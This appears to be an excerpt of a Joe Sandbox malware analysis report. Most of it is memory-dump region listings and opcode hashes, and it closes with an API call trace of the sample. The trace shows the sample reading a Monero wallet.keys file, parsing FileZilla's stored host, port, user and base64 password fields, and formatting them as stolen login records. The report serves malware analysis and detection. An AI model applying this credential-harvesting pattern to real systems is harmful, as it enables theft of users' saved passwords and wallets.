                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                      • Instruction ID: 7ffedd0ace0abf59128e3d8b3964cf1b07af0fc1aad886fbe4f385de7a593d83
                                      • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                      • Instruction Fuzzy Hash: 43D129B01083908FD3149F15C4A472BBFE1AF95708F19899EE4D90B3D1D7BA8948DFA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: b11b8ea3637b980ff5fcad25ab00e76ccd14b22126e2f4e76a7fa8e6613402a9
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: BEB19172A083519BD308CF25C89136BF7E2EFC8310F1AC93EE89997291D774D9419A92
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
• Instruction ID: 3c91ad4b97d7fa32b7010a9f9cec60a267e76517317499f37a03d8184baa6af1
• Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
• Instruction Fuzzy Hash: 99B1A472A083119BD308CF25C45176BF7E2EFC8310F1AC93EF89997291D778D9459A92
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
• Instruction ID: b2e18e21e00d3c6b5ed4c14696468f9d646025f7d040b37db7fe77a0f36c0c80
• Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
• Instruction Fuzzy Hash: BAB10671A097118FD706EE3DC491229F7E1AFE6380F51C72EE895B7662EB31E8818740
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
• Instruction ID: c0bd365f9b2380dc8bd3ac741360320007a7bb86ccbbb7bf30f2b5e8f2738b13
• Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
• Instruction Fuzzy Hash: A591CE71A002118FDF14CEADDC80BBAB3A1AF57300F594568E958AB386D332DD05C7BA
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
• Instruction ID: a9c693d8d9f9735ef77a7e23430fd43fd9693c36f04f6f397f586216ca1e4803
• Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
• Instruction Fuzzy Hash: 1FB15835610648CFDB15CF28C49ABA4BBE0FF45364F29865CE99ACF2A2C735D981CB50
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
• Instruction ID: 6ae4022409e632ad59c041388004c6cce380bc517f3a34dafc3c8343e542ca5f
• Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
• Instruction Fuzzy Hash: 2DC15A75A0471A8FC711DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
• Instruction ID: 2e4eb699d8ad6bc96a797190dc28aa2571ccab4dc3f91933ce0505e51151acd7
• Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
• Instruction Fuzzy Hash: 7B9147319287906AEB169B3CCC417AAB795FFE7350F14C31AF988724A2FB7185818364
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
• Instruction ID: be98a1fe7c34853b6af75dd6daf0e01edadd146362a64ea1db2668a4d591ca1d
• Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
• Instruction Fuzzy Hash: 8BA13172900A19CBEB19CF55CCC1A9EBBB1FB59314F18C62AD41AE77A0D374A944CF60
Memory Dump Source
• Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
• Instruction ID: 26aea02f81f15ffa41958bf060958b5782f7df2707dfda8aea5e5749eeea9ce1
• Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
• Instruction Fuzzy Hash: 98A17D72E087119BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E9419B82
Memory Dump Source
• Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5005d1a2569b2f7afb0743c793b091246b00798fbbbdbc70b22da118de034f8a
• Instruction ID: 1a6cc08641677f1cc8e7ce0a3ec0ed96c13a016b1ed5ca69855bff3bb76b4aea
• Opcode Fuzzy Hash: 5005d1a2569b2f7afb0743c793b091246b00798fbbbdbc70b22da118de034f8a
• Instruction Fuzzy Hash: 56512DF3A0C2009FE7199E29DC5573AB7D6EBD8720F1A853DE6C697384DA395800C686
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9d0ca734ebfa28552260d163e87d392185e6e238753e1a0a4d01d824534e437
                                      • Instruction ID: 18a1dfae8f8b6de21ac3bc8d08f902e87e0f7a0cab489e0f71e9407adbd45889
                                      • Opcode Fuzzy Hash: c9d0ca734ebfa28552260d163e87d392185e6e238753e1a0a4d01d824534e437
                                      • Instruction Fuzzy Hash: BC517BB251C614DFD315AF19E846AAEFBE8FF84760F06092EE6C983640D6745880CB97
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 030ea5be1754e6e78cafcaa43ec82e5fb74c23ca0ca82856b94b32a7d34b4a5d
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: 0A511962E09BD585C7058B7944502EEBFB25FE6210F1E829EC4981B383C2759689D3F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a92f3acfd0a8bc55f350771eaff29c8272d4be9d18bc219edf246b099de4d4d
                                      • Instruction ID: aa6a4a45552a11f609dee8467f83e06d3afa0892a40ceec1289d587e8707b07a
                                      • Opcode Fuzzy Hash: 2a92f3acfd0a8bc55f350771eaff29c8272d4be9d18bc219edf246b099de4d4d
                                      • Instruction Fuzzy Hash: 95315BB3A3C624AFD214A92DDC4767FBBD9EBC1310F15863ED58183E44E9B148064292
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aca71b3b57c4df8f0bf3302268eeaa21aa7a2501e085115bf7d5b88201d70848
                                      • Instruction ID: bda1364488a043fe0671458250bcb43edb168a89ce3d697724a79c60f858ae45
                                      • Opcode Fuzzy Hash: aca71b3b57c4df8f0bf3302268eeaa21aa7a2501e085115bf7d5b88201d70848
                                      • Instruction Fuzzy Hash: 883109F395C3045FF308BE29EC4577EB7E6EB64321F0A493D96D5C2694FA3548008646
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                      • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBF,00D50DBE,00D50DBB,00D50DBA), ref: 00D404C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D404C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D404E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D404F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D4052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D4053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D405C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D405D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D4067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D406AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D406C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00D406D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00D406E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D406F3
                                      • lstrcat.KERNEL32(?,00D51770), ref: 00D40702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40715
                                      • lstrcat.KERNEL32(?,00D51774), ref: 00D40724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00D40733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40746
                                      • lstrcat.KERNEL32(?,00D51780), ref: 00D40755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00D40764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40777
                                      • lstrcat.KERNEL32(?,00D51790), ref: 00D40786
